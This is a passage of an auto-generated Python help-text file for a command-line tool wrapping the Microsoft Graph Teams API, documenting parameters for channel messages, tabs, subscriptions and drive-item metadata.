Usage: --audio album=XX album-artist=XX artist=XX bitrate=XX composers=XX copyright=XX disc=XX \
disc-count=XX duration=XX genre=XX has-drm=XX is-variable-bitrate=XX title=XX track=XX track-count=XX year=XX
album: The title of the album for this audio file.
album-artist: The artist named on the album for the audio file.
artist: The performing artist for the audio file.
bitrate: Bitrate expressed in kbps.
composers: The name of the composer of the audio file.
copyright: Copyright information for the audio file.
disc: The number of the disc this audio file came from.
disc-count: The total number of discs in this album.
duration: Duration of the audio file, expressed in milliseconds
genre: The genre of this audio file.
has-drm: Indicates if the file is protected with digital rights management.
is-variable-bitrate: Indicates if the file is encoded with a variable bitrate.
title: The title of the audio file.
track: The number of the track on the original disc for this audio file.
track-count: The total number of tracks on the original disc for this audio file.
year: The year the audio file was recorded.
- name: --file-system-info
short-summary: "fileSystemInfo"
long-summary: |
Usage: --file-system-info created-date-time=XX last-accessed-date-time=XX last-modified-date-time=XX
created-date-time: The UTC date and time the file was created on a client.
last-accessed-date-time: The UTC date and time the file was last accessed. Available for the recent file \
list only.
last-modified-date-time: The UTC date and time the file was last modified on a client.
- name: --image
short-summary: "image"
long-summary: |
Usage: --image height=XX width=XX
height: Optional. Height of the image, in pixels. Read-only.
width: Optional. Width of the image, in pixels. Read-only.
- name: --location
short-summary: "geoCoordinates"
long-summary: |
Usage: --location altitude=XX latitude=XX longitude=XX
altitude: Optional. The altitude (height), in feet, above sea level for the item. Read-only.
latitude: Optional. The latitude, in decimal, for the item. Read-only.
longitude: Optional. The longitude, in decimal, for the item. Read-only.
- name: --photo
short-summary: "photo"
long-summary: |
Usage: --photo camera-make=XX camera-model=XX exposure-denominator=XX exposure-numerator=XX f-number=XX \
focal-length=XX iso=XX orientation=XX taken-date-time=XX
camera-make: Camera manufacturer. Read-only.
camera-model: Camera model. Read-only.
exposure-denominator: The denominator for the exposure time fraction from the camera. Read-only.
exposure-numerator: The numerator for the exposure time fraction from the camera. Read-only.
f-number: The F-stop value from the camera. Read-only.
focal-length: The focal length from the camera. Read-only.
iso: The ISO value from the camera. Read-only.
orientation: The orientation value from the camera. Writable on OneDrive Personal.
taken-date-time: Represents the date and time the photo was taken. Read-only.
- name: --publication
short-summary: "publicationFacet"
long-summary: |
Usage: --publication level=XX version-id=XX
level: The state of publication for this document. Either published or checkout. Read-only.
version-id: The unique identifier for the version that is visible to the current caller. Read-only.
- name: --microsoft-graph-sharepoint-ids
short-summary: "sharepointIds"
long-summary: |
Usage: --microsoft-graph-sharepoint-ids list-id=XX list-item-id=XX list-item-unique-id=XX site-id=XX \
site-url=XX tenant-id=XX web-id=XX
list-id: The unique identifier (guid) for the item's list in SharePoint.
list-item-id: An integer identifier for the item within the containing list.
list-item-unique-id: The unique identifier (guid) for the item within OneDrive for Business or a \
SharePoint site.
site-id: The unique identifier (guid) for the item's site collection (SPSite).
site-url: The SharePoint URL for the site that contains the item.
tenant-id: The unique identifier (guid) for the tenancy.
web-id: The unique identifier (guid) for the item's site (SPWeb).
- name: --video
short-summary: "video"
long-summary: |
Usage: --video audio-bits-per-sample=XX audio-channels=XX audio-format=XX audio-samples-per-second=XX \
bitrate=XX duration=XX four-cc=XX frame-rate=XX height=XX width=XX
audio-bits-per-sample: Number of audio bits per sample.
audio-channels: Number of audio channels.
audio-format: Name of the audio format (AAC, MP3, etc.).
audio-samples-per-second: Number of audio samples per second.
bitrate: Bit rate of the video in bits per second.
duration: Duration of the file in milliseconds.
four-cc: 'Four character code' name of the video format.
frame-rate: Frame rate of the video.
height: Height of the video, in pixels.
width: Width of the video, in pixels.
- name: --subscriptions
short-summary: "The set of subscriptions on the item. Only supported on the root of a drive."
long-summary: |
Usage: --subscriptions application-id=XX change-type=XX client-state=XX creator-id=XX \
encryption-certificate=XX encryption-certificate-id=XX expiration-date-time=XX include-resource-data=XX \
latest-supported-tls-version=XX lifecycle-notification-url=XX notification-url=XX resource=XX id=XX
application-id: Identifier of the application used to create the subscription. Read-only.
change-type: Required. Indicates the type of change in the subscribed resource that will raise a change \
notification. The supported values are: created, updated, deleted. Multiple values can be combined using a \
comma-separated list.Note: Drive root item and list change notifications support only the updated changeType. User and \
group change notifications support updated and deleted changeType.
client-state: Optional. Specifies the value of the clientState property sent by the service in each change \
notification. The maximum length is 128 characters. The client can check that the change notification came from the \
service by comparing the value of the clientState property sent with the subscription with the value of the \
clientState property received with each change notification.
creator-id: Identifier of the user or service principal that created the subscription. If the app used \
delegated permissions to create the subscription, this field contains the id of the signed-in user the app called on \
behalf of. If the app used application permissions, this field contains the id of the service principal corresponding \
to the app. Read-only.
encryption-certificate: A base64-encoded representation of a certificate with a public key used to encrypt \
resource data in change notifications. Optional. Required when includeResourceData is true.
encryption-certificate-id: A custom app-provided identifier to help identify the certificate needed to \
decrypt resource data. Optional.
expiration-date-time: Required. Specifies the date and time when the webhook subscription expires. The \
time is in UTC, and can be an amount of time from subscription creation that varies for the resource subscribed to. \
See the table below for maximum supported subscription length of time.
include-resource-data: When set to true, change notifications include resource data (such as content of a \
chat message). Optional.
notification-url: Required. The URL of the endpoint that will receive the change notifications. This URL \
must make use of the HTTPS protocol.
resource: Required. Specifies the resource that will be monitored for changes. Do not include the base URL \
(https://graph.microsoft.com/v1.0/). See the possible resource path values for each supported resource.
id: Read-only.
Multiple actions can be specified by using more than one --subscriptions argument.
- name: --versions
short-summary: "The list of previous versions of the item. For more info, see [getting previous versions][]. \
Read-only. Nullable."
long-summary: |
Usage: --versions content=XX size=XX last-modified-by=XX last-modified-date-time=XX publication=XX id=XX
content: The content stream for this version of the item.
size: Indicates the size of the content stream for this version of the item.
last-modified-by: identitySet
last-modified-date-time: Date and time the version was last modified. Read-only.
publication: publicationFacet
id: Read-only.
Multiple actions can be specified by using more than one --versions argument.
- name: --sharepoint-ids1
short-summary: "sharepointIds"
long-summary: |
Usage: --sharepoint-ids1 list-id=XX list-item-id=XX list-item-unique-id=XX site-id=XX site-url=XX \
tenant-id=XX web-id=XX
list-id: The unique identifier (guid) for the item's list in SharePoint.
list-item-id: An integer identifier for the item within the containing list.
list-item-unique-id: The unique identifier (guid) for the item within OneDrive for Business or a \
SharePoint site.
site-id: The unique identifier (guid) for the item's site collection (SPSite).
site-url: The SharePoint URL for the site that contains the item.
tenant-id: The unique identifier (guid) for the tenancy.
web-id: The unique identifier (guid) for the item's site (SPWeb).
- name: --application1
short-summary: "identity"
long-summary: |
Usage: --application1 display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device1
short-summary: "identity"
long-summary: |
Usage: --device1 display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user1
short-summary: "identity"
long-summary: |
Usage: --user1 display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --application2
short-summary: "identity"
long-summary: |
Usage: --application2 display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device2
short-summary: "identity"
long-summary: |
Usage: --device2 display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user2
short-summary: "identity"
long-summary: |
Usage: --user2 display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --content-type
short-summary: "contentTypeInfo"
long-summary: |
Usage: --content-type id=XX name=XX
id: The id of the content type.
name: The name of the content type.
- name: --sharepoint-ids2
short-summary: "sharepointIds"
long-summary: |
Usage: --sharepoint-ids2 list-id=XX list-item-id=XX list-item-unique-id=XX site-id=XX site-url=XX \
tenant-id=XX web-id=XX
list-id: The unique identifier (guid) for the item's list in SharePoint.
list-item-id: An integer identifier for the item within the containing list.
list-item-unique-id: The unique identifier (guid) for the item within OneDrive for Business or a \
SharePoint site.
site-id: The unique identifier (guid) for the item's site collection (SPSite).
site-url: The SharePoint URL for the site that contains the item.
tenant-id: The unique identifier (guid) for the tenancy.
web-id: The unique identifier (guid) for the item's site (SPWeb).
- name: --fields
short-summary: "fieldValueSet"
long-summary: |
Usage: --fields id=XX
id: Read-only.
- name: --microsoft-graph-workbook-application
short-summary: "workbookApplication"
long-summary: |
Usage: --microsoft-graph-workbook-application calculation-mode=XX id=XX
calculation-mode: Returns the calculation mode used in the workbook. Possible values are: Automatic, \
AutomaticExceptTables, Manual.
id: Read-only.
- name: --functions
short-summary: "workbookFunctions"
long-summary: |
Usage: --functions id=XX
id: Read-only.
- name: --microsoft-graph-file-system-info-file-system-info
short-summary: "fileSystemInfo"
long-summary: |
Usage: --microsoft-graph-file-system-info-file-system-info created-date-time=XX last-accessed-date-time=XX \
last-modified-date-time=XX
created-date-time: The UTC date and time the file was created on a client.
last-accessed-date-time: The UTC date and time the file was last accessed. Available for the recent file \
list only.
last-modified-date-time: The UTC date and time the file was last modified on a client.
- name: --microsoft-graph-image
short-summary: "image"
long-summary: |
Usage: --microsoft-graph-image height=XX width=XX
height: Optional. Height of the image, in pixels. Read-only.
width: Optional. Width of the image, in pixels. Read-only.
- name: --package
short-summary: "package"
long-summary: |
Usage: --package type=XX
type: A string indicating the type of package. While oneNote is the only currently defined value, you \
should expect other package types to be returned and handle them accordingly.
- name: --sharepoint-ids3
short-summary: "sharepointIds"
long-summary: |
Usage: --sharepoint-ids3 list-id=XX list-item-id=XX list-item-unique-id=XX site-id=XX site-url=XX \
tenant-id=XX web-id=XX
list-id: The unique identifier (guid) for the item's list in SharePoint.
list-item-id: An integer identifier for the item within the containing list.
list-item-unique-id: The unique identifier (guid) for the item within OneDrive for Business or a \
SharePoint site.
site-id: The unique identifier (guid) for the item's site collection (SPSite).
site-url: The SharePoint URL for the site that contains the item.
tenant-id: The unique identifier (guid) for the tenancy.
web-id: The unique identifier (guid) for the item's site (SPWeb).
- name: --special-folder
short-summary: "specialFolder"
long-summary: |
Usage: --special-folder name=XX
name: The unique identifier for this item in the /drive/special collection
- name: --microsoft-graph-video
short-summary: "video"
long-summary: |
Usage: --microsoft-graph-video audio-bits-per-sample=XX audio-channels=XX audio-format=XX \
audio-samples-per-second=XX bitrate=XX duration=XX four-cc=XX frame-rate=XX height=XX width=XX
audio-bits-per-sample: Number of audio bits per sample.
audio-channels: Number of audio channels.
audio-format: Name of the audio format (AAC, MP3, etc.).
audio-samples-per-second: Number of audio samples per second.
bitrate: Bit rate of the video in bits per second.
duration: Duration of the file in milliseconds.
four-cc: 'Four character code' name of the video format.
frame-rate: Frame rate of the video.
height: Height of the video, in pixels.
width: Width of the video, in pixels.
- name: --view
short-summary: "folderView"
long-summary: |
Usage: --view sort-by=XX sort-order=XX view-type=XX
sort-by: The method by which the folder should be sorted.
sort-order: If true, indicates that items should be sorted in descending order. Otherwise, items should be \
sorted ascending.
view-type: The type of view that should be used to represent the folder.
- name: --hashes
short-summary: "hashes"
long-summary: |
Usage: --hashes crc32-hash=XX quick-xor-hash=XX sha1-hash=XX sha256-hash=XX
crc32-hash: The CRC32 value of the file in little endian (if available). Read-only.
quick-xor-hash: A proprietary hash of the file that can be used to determine if the contents of the file \
have changed (if available). Read-only.
sha1-hash: SHA1 hash for the contents of the file (if available). Read-only.
sha256-hash: SHA256 hash for the contents of the file (if available). Read-only.
"""
helps['teams team-channel update-member'] = """
type: command
short-summary: "Update the navigation property members in teams."
"""
helps['teams team-channel update-message'] = """
type: command
short-summary: "Update the navigation property messages in teams."
parameters:
- name: --attachments
short-summary: "Attached files. Attachments are currently read-only – sending attachments is not supported."
long-summary: |
Usage: --attachments content=XX content-type=XX content-url=XX id=XX name=XX thumbnail-url=XX
content: The content of the attachment. If the attachment is a rich card, set the property to the rich \
card object. This property and contentUrl are mutually exclusive.
content-type: The media type of the content attachment. It can have the following values: reference: \
Attachment is a link to another file. Populate the contentURL with the link to the object.file: Raw file attachment. \
Populate the contenturl field with the base64 encoding of the file in data: format.image/: Image type with the type of \
the image specified ex: image/png, image/jpeg, image/gif. Populate the contentUrl field with the base64 encoding of \
the file in data: format.video/: Video type with the format specified. Ex: video/mp4. Populate the contentUrl field \
with the base64 encoding of the file in data: format.audio/: Audio type with the format specified. Ex: audio/wmw. \
Populate the contentUrl field with the base64 encoding of the file in data: format.application/card type: Rich card \
attachment type with the card type specifying the exact card format to use. Set content with the json format of the \
card. Supported values for card type include:application/vnd.microsoft.card.adaptive: A rich card that can contain any \
combination of text, speech, images,,buttons, and input fields. Set the content property to,an AdaptiveCard \
object.application/vnd.microsoft.card.animation: A rich card that plays animation. Set the content property,to an \
AnimationCardobject.application/vnd.microsoft.card.audio: A rich card that plays audio files. Set the content \
property,to an AudioCard object.application/vnd.microsoft.card.video: A rich card that plays videos. Set the content \
property,to a VideoCard object.application/vnd.microsoft.card.hero: A Hero card. Set the content property to a \
HeroCard object.application/vnd.microsoft.card.thumbnail: A Thumbnail card. Set the content property to a \
ThumbnailCard object.application/vnd.microsoft.com.card.receipt: A Receipt card. Set the content property to a \
ReceiptCard object.application/vnd.microsoft.com.card.signin: A user Sign In card. Set the content property to a \
SignInCard object.
content-url: URL for the content of the attachment. Supported protocols: http, https, file and data.
id: Read-only. Unique id of the attachment.
name: Name of the attachment.
thumbnail-url: URL to a thumbnail image that the channel can use if it supports using an alternative, \
smaller form of content or contentUrl. For example, if you set contentType to application/word and set contentUrl to \
the location of the Word document, you might include a thumbnail image that represents the document. The channel could \
display the thumbnail image instead of the document. When the user clicks the image, the channel would open the \
document.
Multiple actions can be specified by using more than one --attachments argument.
- name: --body
short-summary: "itemBody"
long-summary: |
Usage: --body content=XX content-type=XX
content: The content of the item.
- name: --hosted-contents
long-summary: |
Usage: --hosted-contents id=XX
id: Read-only.
Multiple actions can be specified by using more than one --hosted-contents argument.
- name: --policy-tip
short-summary: "chatMessagePolicyViolationPolicyTip"
long-summary: |
Usage: --policy-tip compliance-url=XX general-text=XX matched-condition-descriptions=XX
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-channel update-tab'] = """
type: command
short-summary: "Update the navigation property tabs in teams."
parameters:
- name: --configuration
short-summary: "teamsTabConfiguration"
long-summary: |
Usage: --configuration content-url=XX entity-id=XX remove-url=XX website-url=XX
content-url: Url used for rendering tab contents in Teams. Required.
entity-id: Identifier for the entity hosted by the tab provider.
remove-url: Url called by Teams client when a Tab is removed using the Teams Client.
website-url: Url for showing tab contents outside of Teams.
- name: --app-definitions
short-summary: "The details for each version of the app."
long-summary: |
Usage: --app-definitions display-name=XX teams-app-id=XX version=XX id=XX
display-name: The name of the app provided by the app developer.
teams-app-id: The ID from the Teams app manifest.
version: The version number of the application.
id: Read-only.
Multiple actions can be specified by using more than one --app-definitions argument.
"""
helps['teams team-channel-message'] = """
type: group
short-summary: Manage team channel message with teams_v1_0
"""
helps['teams team-channel-message create-hosted-content'] = """
type: command
short-summary: "Create new navigation property to hostedContents for teams."
"""
helps['teams team-channel-message create-reply'] = """
type: command
short-summary: "Create new navigation property to replies for teams."
parameters:
- name: --attachments
short-summary: "Attached files. Attachments are currently read-only – sending attachments is not supported."
long-summary: |
Usage: --attachments content=XX content-type=XX content-url=XX id=XX name=XX thumbnail-url=XX
content: The content of the attachment. If the attachment is a rich card, set the property to the rich \
card object. This property and contentUrl are mutually exclusive.
content-type: The media type of the content attachment. It can have the following values: reference: \
Attachment is a link to another file. Populate the contentURL with the link to the object.file: Raw file attachment. \
Populate the contenturl field with the base64 encoding of the file in data: format.image/: Image type with the type of \
the image specified ex: image/png, image/jpeg, image/gif. Populate the contentUrl field with the base64 encoding of \
the file in data: format.video/: Video type with the format specified. Ex: video/mp4. Populate the contentUrl field \
with the base64 encoding of the file in data: format.audio/: Audio type with the format specified. Ex: audio/wmw. \
Populate the contentUrl field with the base64 encoding of the file in data: format.application/card type: Rich card \
attachment type with the card type specifying the exact card format to use. Set content with the json format of the \
card. Supported values for card type include:application/vnd.microsoft.card.adaptive: A rich card that can contain any \
combination of text, speech, images,,buttons, and input fields. Set the content property to,an AdaptiveCard \
object.application/vnd.microsoft.card.animation: A rich card that plays animation. Set the content property,to an \
AnimationCardobject.application/vnd.microsoft.card.audio: A rich card that plays audio files. Set the content \
property,to an AudioCard object.application/vnd.microsoft.card.video: A rich card that plays videos. Set the content \
property,to a VideoCard object.application/vnd.microsoft.card.hero: A Hero card. Set the content property to a \
HeroCard object.application/vnd.microsoft.card.thumbnail: A Thumbnail card. Set the content property to a \
ThumbnailCard object.application/vnd.microsoft.com.card.receipt: A Receipt card. Set the content property to a \
ReceiptCard object.application/vnd.microsoft.com.card.signin: A user Sign In card. Set the content property to a \
SignInCard object.
content-url: URL for the content of the attachment. Supported protocols: http, https, file and data.
id: Read-only. Unique id of the attachment.
name: Name of the attachment.
thumbnail-url: URL to a thumbnail image that the channel can use if it supports using an alternative, \
smaller form of content or contentUrl. For example, if you set contentType to application/word and set contentUrl to \
the location of the Word document, you might include a thumbnail image that represents the document. The channel could \
display the thumbnail image instead of the document. When the user clicks the image, the channel would open the \
document.
Multiple actions can be specified by using more than one --attachments argument.
- name: --body
short-summary: "itemBody"
long-summary: |
Usage: --body content=XX content-type=XX
content: The content of the item.
- name: --hosted-contents
long-summary: |
Usage: --hosted-contents id=XX
id: Read-only.
Multiple actions can be specified by using more than one --hosted-contents argument.
- name: --policy-tip
short-summary: "chatMessagePolicyViolationPolicyTip"
long-summary: |
Usage: --policy-tip compliance-url=XX general-text=XX matched-condition-descriptions=XX
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-channel-message delete-hosted-content'] = """
type: command
short-summary: "Delete navigation property hostedContents for teams."
"""
helps['teams team-channel-message delete-reply'] = """
type: command
short-summary: "Delete navigation property replies for teams."
"""
helps['teams team-channel-message list-hosted-content'] = """
type: command
short-summary: "Get hostedContents from teams."
"""
helps['teams team-channel-message list-reply'] = """
type: command
short-summary: "Get replies from teams."
"""
helps['teams team-channel-message show-hosted-content'] = """
type: command
short-summary: "Get hostedContents from teams."
"""
helps['teams team-channel-message show-reply'] = """
type: command
short-summary: "Get replies from teams."
"""
helps['teams team-channel-message update-hosted-content'] = """
type: command
short-summary: "Update the navigation property hostedContents in teams."
"""
helps['teams team-channel-message update-reply'] = """
type: command
short-summary: "Update the navigation property replies in teams."
parameters:
- name: --attachments
short-summary: "Attached files. Attachments are currently read-only – sending attachments is not supported."
long-summary: |
Usage: --attachments content=XX content-type=XX content-url=XX id=XX name=XX thumbnail-url=XX
content: The content of the attachment. If the attachment is a rich card, set the property to the rich \
card object. This property and contentUrl are mutually exclusive.
content-type: The media type of the content attachment. It can have the following values: reference: \
Attachment is a link to another file. Populate the contentURL with the link to the object.file: Raw file attachment. \
Populate the contenturl field with the base64 encoding of the file in data: format.image/: Image type with the type of \
the image specified ex: image/png, image/jpeg, image/gif. Populate the contentUrl field with the base64 encoding of \
the file in data: format.video/: Video type with the format specified. Ex: video/mp4. Populate the contentUrl field \
with the base64 encoding of the file in data: format.audio/: Audio type with the format specified. Ex: audio/wmw. \
Populate the contentUrl field with the base64 encoding of the file in data: format.application/card type: Rich card \
attachment type with the card type specifying the exact card format to use. Set content with the json format of the \
card. Supported values for card type include:application/vnd.microsoft.card.adaptive: A rich card that can contain any \
combination of text, speech, images,,buttons, and input fields. Set the content property to,an AdaptiveCard \
object.application/vnd.microsoft.card.animation: A rich card that plays animation. Set the content property,to an \
AnimationCardobject.application/vnd.microsoft.card.audio: A rich card that plays audio files. Set the content \
property,to an AudioCard object.application/vnd.microsoft.card.video: A rich card that plays videos. Set the content \
property,to a VideoCard object.application/vnd.microsoft.card.hero: A Hero card. Set the content property to a \
HeroCard object.application/vnd.microsoft.card.thumbnail: A Thumbnail card. Set the content property to a \
ThumbnailCard object.application/vnd.microsoft.com.card.receipt: A Receipt card. Set the content property to a \
ReceiptCard object.application/vnd.microsoft.com.card.signin: A user Sign In card. Set the content property to a \
SignInCard object.
content-url: URL for the content of the attachment. Supported protocols: http, https, file and data.
id: Read-only. Unique id of the attachment.
name: Name of the attachment.
thumbnail-url: URL to a thumbnail image that the channel can use if it supports using an alternative, \
smaller form of content or contentUrl. For example, if you set contentType to application/word and set contentUrl to \
the location of the Word document, you might include a thumbnail image that represents the document. The channel could \
display the thumbnail image instead of the document. When the user clicks the image, the channel would open the \
document.
Multiple actions can be specified by using more than one --attachments argument.
- name: --body
short-summary: "itemBody"
long-summary: |
Usage: --body content=XX content-type=XX
content: The content of the item.
- name: --hosted-contents
long-summary: |
Usage: --hosted-contents id=XX
id: Read-only.
Multiple actions can be specified by using more than one --hosted-contents argument.
- name: --policy-tip
short-summary: "chatMessagePolicyViolationPolicyTip"
long-summary: |
Usage: --policy-tip compliance-url=XX general-text=XX matched-condition-descriptions=XX
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-channel-tab'] = """
type: group
short-summary: Manage team channel tab with teams_v1_0
"""
helps['teams team-channel-tab delete-ref-team-app'] = """
type: command
short-summary: "Delete ref of navigation property teamsApp for teams."
"""
helps['teams team-channel-tab set-ref-team-app'] = """
type: command
short-summary: "Update the ref of navigation property teamsApp in teams."
"""
helps['teams team-channel-tab show-ref-team-app'] = """
type: command
short-summary: "Get ref of teamsApp from teams."
"""
helps['teams team-channel-tab show-team-app'] = """
type: command
short-summary: "Get teamsApp from teams."
"""
helps['teams team-installed-app'] = """
type: group
short-summary: Manage team installed app with teams_v1_0
"""
helps['teams team-installed-app delete-ref-team-app'] = """
type: command
short-summary: "Delete ref of navigation property teamsApp for teams."
"""
helps['teams team-installed-app delete-ref-team-app-definition'] = """
type: command
short-summary: "Delete ref of navigation property teamsAppDefinition for teams."
"""
helps['teams team-installed-app set-ref-team-app'] = """
type: command
short-summary: "Update the ref of navigation property teamsApp in teams."
"""
helps['teams team-installed-app set-ref-team-app-definition'] = """
type: command
short-summary: "Update the ref of navigation property teamsAppDefinition in teams."
"""
helps['teams team-installed-app show-ref-team-app'] = """
type: command
short-summary: "Get ref of teamsApp from teams."
"""
helps['teams team-installed-app show-ref-team-app-definition'] = """
type: command
short-summary: "Get ref of teamsAppDefinition from teams."
"""
helps['teams team-installed-app show-team-app'] = """
type: command
short-summary: "Get teamsApp from teams."
"""
helps['teams team-installed-app show-team-app-definition'] = """
type: command
short-summary: "Get teamsAppDefinition from teams."
"""
helps['teams team-installed-app upgrade'] = """
type: command
short-summary: "Invoke action upgrade."
"""
helps['teams team-primary-channel'] = """
type: group
short-summary: Manage team primary channel with teams_v1_0
"""
helps['teams team-primary-channel create-member'] = """
type: command
short-summary: "Create new navigation property to members for teams."
"""
helps['teams team-primary-channel create-message'] = """
type: command
short-summary: "Create new navigation property to messages for teams."
parameters:
- name: --attachments
short-summary: "Attached files. Attachments are currently read-only – sending attachments is not supported."
long-summary: |
Usage: --attachments content=XX content-type=XX content-url=XX id=XX name=XX thumbnail-url=XX
content: The content of the attachment. If the attachment is a rich card, set the property to the rich \
card object. This property and contentUrl are mutually exclusive.
content-type: The media type of the content attachment. It can have the following values: reference: \
Attachment is a link to another file. Populate the contentURL with the link to the object.file: Raw file attachment. \
Populate the contenturl field with the base64 encoding of the file in data: format.image/: Image type with the type of \
the image specified ex: image/png, image/jpeg, image/gif. Populate the contentUrl field with the base64 encoding of \
the file in data: format.video/: Video type with the format specified. Ex: video/mp4. Populate the contentUrl field \
with the base64 encoding of the file in data: format.audio/: Audio type with the format specified. Ex: audio/wmw. \
Populate the contentUrl field with the base64 encoding of the file in data: format.application/card type: Rich card \
attachment type with the card type specifying the exact card format to use. Set content with the json format of the \
card. Supported values for card type include:application/vnd.microsoft.card.adaptive: A rich card that can contain any \
combination of text, speech, images,,buttons, and input fields. Set the content property to,an AdaptiveCard \
object.application/vnd.microsoft.card.animation: A rich card that plays animation. Set the content property,to an \
AnimationCardobject.application/vnd.microsoft.card.audio: A rich card that plays audio files. Set the content \
property,to an AudioCard object.application/vnd.microsoft.card.video: A rich card that plays videos. Set the content \
property,to a VideoCard object.application/vnd.microsoft.card.hero: A Hero card. Set the content property to a \
HeroCard object.application/vnd.microsoft.card.thumbnail: A Thumbnail card. Set the content property to a \
ThumbnailCard object.application/vnd.microsoft.com.card.receipt: A Receipt card. Set the content property to a \
ReceiptCard object.application/vnd.microsoft.com.card.signin: A user Sign In card. Set the content property to a \
SignInCard object.
content-url: URL for the content of the attachment. Supported protocols: http, https, file and data.
id: Read-only. Unique id of the attachment.
name: Name of the attachment.
thumbnail-url: URL to a thumbnail image that the channel can use if it supports using an alternative, \
smaller form of content or contentUrl. For example, if you set contentType to application/word and set contentUrl to \
the location of the Word document, you might include a thumbnail image that represents the document. The channel could \
display the thumbnail image instead of the document. When the user clicks the image, the channel would open the \
document.
Multiple actions can be specified by using more than one --attachments argument.
- name: --body
short-summary: "itemBody"
long-summary: |
Usage: --body content=XX content-type=XX
content: The content of the item.
- name: --hosted-contents
long-summary: |
Usage: --hosted-contents id=XX
id: Read-only.
Multiple actions can be specified by using more than one --hosted-contents argument.
- name: --policy-tip
short-summary: "chatMessagePolicyViolationPolicyTip"
long-summary: |
Usage: --policy-tip compliance-url=XX general-text=XX matched-condition-descriptions=XX
- name: --application
short-summary: "identity"
long-summary: |
Usage: --application display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --device
short-summary: "identity"
long-summary: |
Usage: --device display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
- name: --user
short-summary: "identity"
long-summary: |
Usage: --user display-name=XX id=XX
display-name: The identity's display name. Note that this may not always be available or up to date. For \
example, if a user changes their display name, the API may show the new value in a future response, but the items \
associated with the user won't show up as having changed when using delta.
id: Unique identifier for the identity.
"""
helps['teams team-primary-channel create-tab'] = """
type: command
short-summary: "Create new navigation property to tabs for teams."
parameters:
- name: --configuration
short-summary: "teamsTabConfiguration"
long-summary: |
Usage: --configuration content-url=XX entity-id=XX remove-url=XX website-url=XX
content-url: Url used for rendering tab contents in Teams. Required.
entity-id: Identifier for the entity hosted by the tab provider.
remove-url: Url called by Teams client when a Tab is removed using the Teams Client.
website-url: Url for showing tab contents outside of Teams.
- name: --app-definitions
short-summary: "The details for each version of the app."
long-summary: |
Usage: --app-definitions display-name=XX teams-app-id=XX version=XX id=XX
display-name: The name of the app provided by the app developer.
teams-app-id: The ID from the Teams app manifest.
version: The version number of the application.
id: Read-only.
Multiple actions can be specified by using more than one --app-definitions argument.
"""
helps['teams team-primary-channel delete-file-folder'] = """
type: command
short-summary: "Delete navigation property filesFolder for teams."
"""
helps['teams team-primary-channel delete-member'] = """
type: command
short-summary: "Delete navigation property members for teams."
"""
helps['teams team-primary-channel delete-message'] = """
type: command
short-summary: "Delete navigation property messages for teams."
"""
helps['teams team-primary-channel delete-tab'] = """
type: command
short-summary: "Delete navigation property tabs for teams."
"""
